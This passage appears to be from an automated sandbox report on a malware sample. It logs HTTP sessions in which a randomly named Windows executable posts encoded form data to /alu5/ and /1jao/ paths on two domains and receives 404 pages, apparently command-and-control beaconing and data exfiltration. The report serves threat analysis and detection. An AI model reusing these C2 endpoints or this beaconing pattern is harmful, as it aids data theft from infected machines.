                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  31 | 192.168.2.4 | 50005 | 209.74.77.107 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:43.514550924 CET | 10865 | OUT | POST /alu5/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Referer: http://www.learnwithus.site/alu5/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 31 46 65 75 59 4c 31 79 53 41 6c 4a 75 61 69 53 77 48 4e 45 76 31 37 50 31 6a 4d 2b 57 72 30 66 42 71 78 57 59 39 6f 6c 39 7a 2f 47 4c 56 73 6e 72 6f 35 46 47 33 32 66 53 4d 4d 4b 6e 4d 76 4d 64 57 39 59 6d 59 77 79 6c 37 47 66 42 61 67 66 79 73 45 53 78 4a 79 6a 72 36 45 42 47 67 6b 74 4d 56 52 47 70 42 65 37 6f 4d 6a 6e 35 51 73 57 4d 4b 4d 38 51 39 37 42 62 46 72 55 74 4d 6d 73 47 49 33 31 4c 67 74 53 39 4d 71 39 62 4c 72 45 52 63 54 33 32 33 65 6d 76 69 44 48 53 64 48 35 46 74 6b 49 30 74 43 57 62 4b 65 39 4f 72 70 56 49 2b 71 36 35 75 55 43 76 52 56 76 7a 55 77 43 2f 75 7a 67 61 6e 67 45 32 6e 76 7a 51 78 37 79 55 75 77 55 4e 4b 2f 72 6e 6d 73 37 59 75 31 51 50 70 67 4f 4b 62 55 30 6d 50 74 75 78 38 56 4a 36 44 68 5a 5a 70 54 55 68 48 49 70 67 70 7a 54 54 31 4c 68 38 44 71 51 76 67 56 65 67 67 75 2b 68 41 50 76 74 34 75 61 73 73 50 53 6b 50 4f 76 [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=[TRUNCATED]
                                                                  Dec 4, 2024 12:51:44.806919098 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:44 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  32 | 192.168.2.4 | 50012 | 209.74.77.107 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:46.201370955 CET | 487 | OUT | GET /alu5/?WnQdf=JhLPW&BTPDLZX=m83uTjDkEXAXcvpZaWV1PNYda+U7jg2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxrxuW5VDk7Vq07uTWEP/Rgr9zrLSf1ip7NM4= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.learnwithus.site
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:51:47.415009975 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:47 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  33 | 192.168.2.4 | 50037 | 104.21.34.103 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:52:05.550359011 CET | 778 | OUT | POST /1jao/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rafconstrutora.online
                                                                  Origin: http://www.rafconstrutora.online
                                                                  Referer: http://www.rafconstrutora.online/1jao/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 39 56 32 69 47 6c 47 39 33 38 77 42 4a 54 49 35 61 6a 65 54 4a 58 46 63 39 38 61 65 63 4a 71 30 68 6b 4b 42 50 69 34 49 6a 4b 4f 36 36 71 39 66 38 79 41 55 51 45 71 2f 48 68 4f 48 75 54 73 31 45 5a 51 76 49 68 76 72 30 62 4c 43 4d 4e 43 58 72 48 39 41 68 41 63 79 5a 75 7a 4f 65 6f 74 77 6a 5a 75 6b 45 33 4a 34 74 2b 48 6b 39 49 39 4d 45 30 36 47 43 4d 66 31 74 77 63 63 64 7a 4e 68 37 45 77 35 53 4d 4f 53 78 44 31 56 52 41 5a 43 57 54 65 6a 70 77 54 31 6a 58 35 2f 55 43 50 38 6c 36 45 73 46 6f 73 38 47 4a 56 4b 79 4d 31 2b 31 35 58 64 4e 69 6f 75 33 65 42 35 6f 6e 73 52 58 77 3d 3d
                                                                  Data Ascii: BTPDLZX=9V2iGlG938wBJTI5ajeTJXFc98aecJq0hkKBPi4IjKO66q9f8yAUQEq/HhOHuTs1EZQvIhvr0bLCMNCXrH9AhAcyZuzOeotwjZukE3J4t+Hk9I9ME06GCMf1twccdzNh7Ew5SMOSxD1VRAZCWTejpwT1jX5/UCP8l6EsFos8GJVKyM1+15XdNiou3eB5onsRXw==
                                                                  Dec 4, 2024 12:52:06.692665100 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:52:06 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H5P8%2Bt%2FBRk98M2pup3d%2BCsjvYqYTE%2BjDjrlCM2SvkzoaX1tHSMmDiEEV4hAfma9Ll3M3hMVMr5sk0rTE6f4t9fg19QV8BptutSmr0aFOUD1U7ojuw3j%2B6wIsKGAahLH%2B%2BFPAdHCJyq5pnLUU"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb96a06fc80f46-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                  Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:
                                                                  Dec 4, 2024 12:52:06.692759037 CET | 503 | IN | Data Raw: a7 32 e7 b3 01 73 3e eb e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e
                                                                  Data Ascii: 2s>2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp w


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  34 | 192.168.2.4 | 50038 | 104.21.34.103 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:52:08.220882893 CET | 798 | OUT | POST /1jao/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rafconstrutora.online
                                                                  Origin: http://www.rafconstrutora.online
                                                                  Referer: http://www.rafconstrutora.online/1jao/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 39 56 32 69 47 6c 47 39 33 38 77 42 62 68 63 35 4a 53 65 54 65 6e 46 66 2b 38 61 65 46 35 71 77 68 6b 47 42 50 6e 63 59 6a 38 2b 36 39 4f 35 66 39 7a 41 55 58 45 71 2f 4d 42 4f 47 74 6a 73 41 45 5a 56 51 49 6c 7a 72 30 62 33 43 4d 4d 79 58 72 77 70 50 6a 51 63 77 52 4f 7a 41 42 34 74 77 6a 5a 75 6b 45 7a 68 65 74 2b 76 6b 68 72 56 4d 43 56 36 48 4d 73 66 32 71 77 63 63 4c 44 4e 6c 37 45 78 63 53 4a 79 73 78 41 64 56 52 42 70 43 58 43 65 67 6e 41 54 73 6e 58 34 66 64 44 75 53 6e 76 38 6e 41 4f 41 74 5a 4e 46 4f 2b 71 34 6b 6b 49 32 4b 66 69 4d 64 71 5a 49 4e 6c 6b 52 59 4d 37 6e 47 4b 57 61 51 59 71 31 6a 58 75 47 30 46 31 79 38 2f 70 49 3d
                                                                  Data Ascii: BTPDLZX=9V2iGlG938wBbhc5JSeTenFf+8aeF5qwhkGBPncYj8+69O5f9zAUXEq/MBOGtjsAEZVQIlzr0b3CMMyXrwpPjQcwROzAB4twjZukEzhet+vkhrVMCV6HMsf2qwccLDNl7ExcSJysxAdVRBpCXCegnATsnX4fdDuSnv8nAOAtZNFO+q4kkI2KfiMdqZINlkRYM7nGKWaQYq1jXuG0F1y8/pI=
                                                                  Dec 4, 2024 12:52:09.364029884 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:52:09 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bz%2Fr7hIiGMqs1GErY73nJpl5Lf88jiKZHOv3R7MUmwkKHxxHhzT3C5Ax1jqxO%2Bq8zU1btX5HyqRE1%2FfDonpUQOXH7qq3Xn3CytqtYooCbkjjvndM1jrEhJZMPDnATpyD9Ui9FWlTM9P6bejJ"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb96b11bb842a0-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1738&rtt_var=869&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                  Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>
                                                                  Dec 4, 2024 12:52:09.364093065 CET | 495 | IN | Data Raw: e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22
                                                                  Data Ascii: 2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  35 | 192.168.2.4 | 50039 | 104.21.34.103 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:52:10.892441034 CET | 10880 | OUT | POST /1jao/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rafconstrutora.online
                                                                  Origin: http://www.rafconstrutora.online
                                                                  Referer: http://www.rafconstrutora.online/1jao/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 39 56 32 69 47 6c 47 39 33 38 77 42 62 68 63 35 4a 53 65 54 65 6e 46 66 2b 38 61 65 46 35 71 77 68 6b 47 42 50 6e 63 59 6a 38 32 36 36 37 74 66 38 51 59 55 57 45 71 2f 46 68 4f 44 74 6a 73 6e 45 5a 74 55 49 6c 2f 56 30 65 7a 43 4f 75 36 58 6a 68 70 50 71 51 63 77 4f 2b 7a 4e 65 6f 74 68 6a 5a 2b 67 45 33 46 65 74 2b 76 6b 68 74 70 4d 42 45 36 48 42 4d 66 31 74 77 63 6d 64 7a 4e 64 37 45 35 71 53 49 6a 5a 78 51 39 56 52 68 35 43 51 30 71 67 6c 67 54 75 69 58 34 39 64 44 69 52 6e 76 4a 65 41 4b 41 48 5a 4b 31 4f 76 2b 4e 65 32 6f 48 55 65 7a 73 5a 2f 72 55 6f 68 54 31 62 4b 70 4c 38 61 30 43 6c 62 4c 45 55 51 2f 7a 51 41 6b 65 69 70 4f 45 32 44 32 6f 70 49 6f 53 73 6a 30 6b 62 2f 30 50 76 66 58 31 71 4c 61 47 51 4e 35 78 54 58 63 6f 6a 2b 45 52 34 6a 67 63 43 30 41 6a 5a 30 4e 30 44 42 70 5a 59 30 55 49 37 56 33 6e 39 34 75 45 69 69 46 63 34 2f 73 6e 64 61 57 47 55 6e 37 4a 62 72 4f 6b 36 50 75 79 46 59 49 4e 4b 57 56 59 6c 4f 56 30 73 4e 4a 2b 67 59 64 46 6d 4f 4f 4e 6f 6e 6f [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=[TRUNCATED]
                                                                  Dec 4, 2024 12:52:12.088907003 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:52:11 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8eWob8r6a%2B55cpwZ%2BltXNT6hTHR3GJj45T%2F5P%2FcT%2BfijU9y9Hm4fHcXIdDHdqjoRJgEA2d7pnlNaVm7YiVtI%2BkMMDhSxWj4X0TAAPA0c0yczfBGG8cm9o%2FsFxgZ5g5eWJj3UQgA2DqEKefqW"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb96c20a374369-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2459&min_rtt=2459&rtt_var=1229&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10880&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  36          192.168.2.4  50040        104.21.34.103   80                4348  C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                  Dec 4, 2024 12:52:13.560717106 CET  492                OUT        GET /1jao/?WnQdf=JhLPW&BTPDLZX=wXeCFQWa9OsffQZ1KRXPZEZX8+i6d5mUhyyCbFo+uZizrpQ17AwBRErPIC2GsWEsFfVeFw/t98C8OszppSdM3wkRcNb8cvMpvLzxOiNeiMb5wrheE0z0IqI= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.rafconstrutora.online
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:52:14.720558882 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:52:14 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
